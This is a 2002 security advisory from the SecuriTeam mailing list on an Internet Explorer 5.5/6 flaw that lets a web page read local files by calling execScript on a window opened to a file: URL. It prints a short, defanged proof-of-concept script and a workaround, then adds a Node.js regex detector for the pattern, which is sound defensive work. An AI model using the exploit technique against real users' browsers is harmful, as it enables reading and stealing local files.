[NT] More Reading of Local Files Vulnerabilities in MSIE

From: support@securiteam.com
Date: 01/14/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 14 Jan 2002 08:53:11 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  More Reading of Local Files Vulnerabilities in MSIE
------------------------------------------------------------------------

SUMMARY

There is a security vulnerability in IE 5.5 and 6 (probably other versions
as well) which allows reading and sending of local files. The problem lies
in the fact that you are able to access a local file's domain by calling
the execScript function on a newly created window. The sample exploit
provided can only read browser-readable files; however, it is highly likely
that reading binary files is possible as well (by attaching an event to
the domain that calls the HTTP XML component, which itself, at the time of
writing, is still vulnerable as well). In order for this exploit to work,
the file name must be known.

Further, if your exploit page is modified so that a website is opened
rather than a local file, the calling script can access the properties of
the website.

(NOTE, this vulnerability is similar in concept to:
<http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html> Internet
Explorer 6 Allows Local File Reading (XMLHTTP))

DETAILS

Vulnerable systems:
Internet Explorer version 6 (Windows XP with all patches installed)
Internet Explorer version 5.5 (Windows ME)

Example:
(NOTE: SCRIPT's 'I' letter has been replaced with a !)
    <scr!pt language="javascript">
      
      var extDoc
      
      function doIt() {
        
        // open an external window and store the reference to it in extDoc
        
        extDoc = document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');
        
        // wait 2 seconds for the external window to load
        // then execute some javascript code that displays the body of the
        // document
        
        cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';
        setTimeout(cmd,2000);
        
      }
      
    </script>

Workaround:
Disable active scripting.
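
The pattern in the example above (a window reference obtained from open() on a file: URL or on a website, followed by execScript on that reference) can be flagged statically in HTML content. The following Node.js heuristic is an added example, not part of the original advisory; the function names and sample pages are constructed, and it also covers the website variant mentioned in the summary.

```javascript
// Added example, not from the advisory: heuristic static check for the
// open()-then-execScript pattern. All names and samples are constructed.

// Pull inline script bodies out of HTML; also accepts the defanged
// "<scr!pt>" spelling used in the advisory.
function extractScripts(html) {
  const re = /<scr[i!]pt\b[^>]*>([\s\S]*?)<\/scr[i!]pt\s*>/gi;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

// Find "ref = window.open(url, ...)" or "ref = document.open(url, ...)" with a
// literal URL, then check whether execScript is called on ref anywhere in the
// same script (including inside a string handed to setTimeout).
function findOpenThenExecScript(html) {
  const openRe =
    /([A-Za-z_$][\w$]*)\s*=\s*(?:window|document)\s*\.\s*open\s*\(\s*(['"])(.*?)\2/g;
  const findings = [];
  for (const script of extractScripts(html)) {
    for (const m of script.matchAll(openRe)) {
      const ref = m[1];
      const url = m[3].trim();
      const kind = /^file:/i.test(url) ? 'local-file'
        : /^https?:/i.test(url) ? 'remote-site' : null;
      if (!kind) continue; // relative or empty URL: not the reported pattern
      const escaped = ref.replace(/\$/g, '\\$&');
      const callRe = new RegExp(
        '(?<![\\w$])' + escaped + '\\s*\\.\\s*execScript\\s*\\(');
      if (callRe.test(script)) findings.push({ ref, url, kind });
    }
  }
  return findings;
}

// Constructed sample modelled on the advisory's page (placeholder file name).
const SAMPLE_SUSPECT = [
  '<scr!pt language="javascript">',
  'var extDoc',
  'function doIt() {',
  '  extDoc =',
  "document.open('file:///C:/example.txt','w','height=200,width=400');",
  "  cmd = 'extDoc.execScript(\"void 0\", \"Jscript\");';",
  '  setTimeout(cmd,2000);',
  '}',
  '</script>',
].join('\n');

// Constructed benign sample: same-site popup, no execScript.
const SAMPLE_BENIGN =
  '<script>var w = window.open("help.html","h"); w.focus();</script>';

console.log(findOpenThenExecScript(SAMPLE_SUSPECT));
```

This is a regex heuristic: it only sees literal URLs and inline scripts, so treat a hit as a reason to inspect the page rather than as a verdict.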

ADDITIONAL INFORMATION

The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
jelmer.
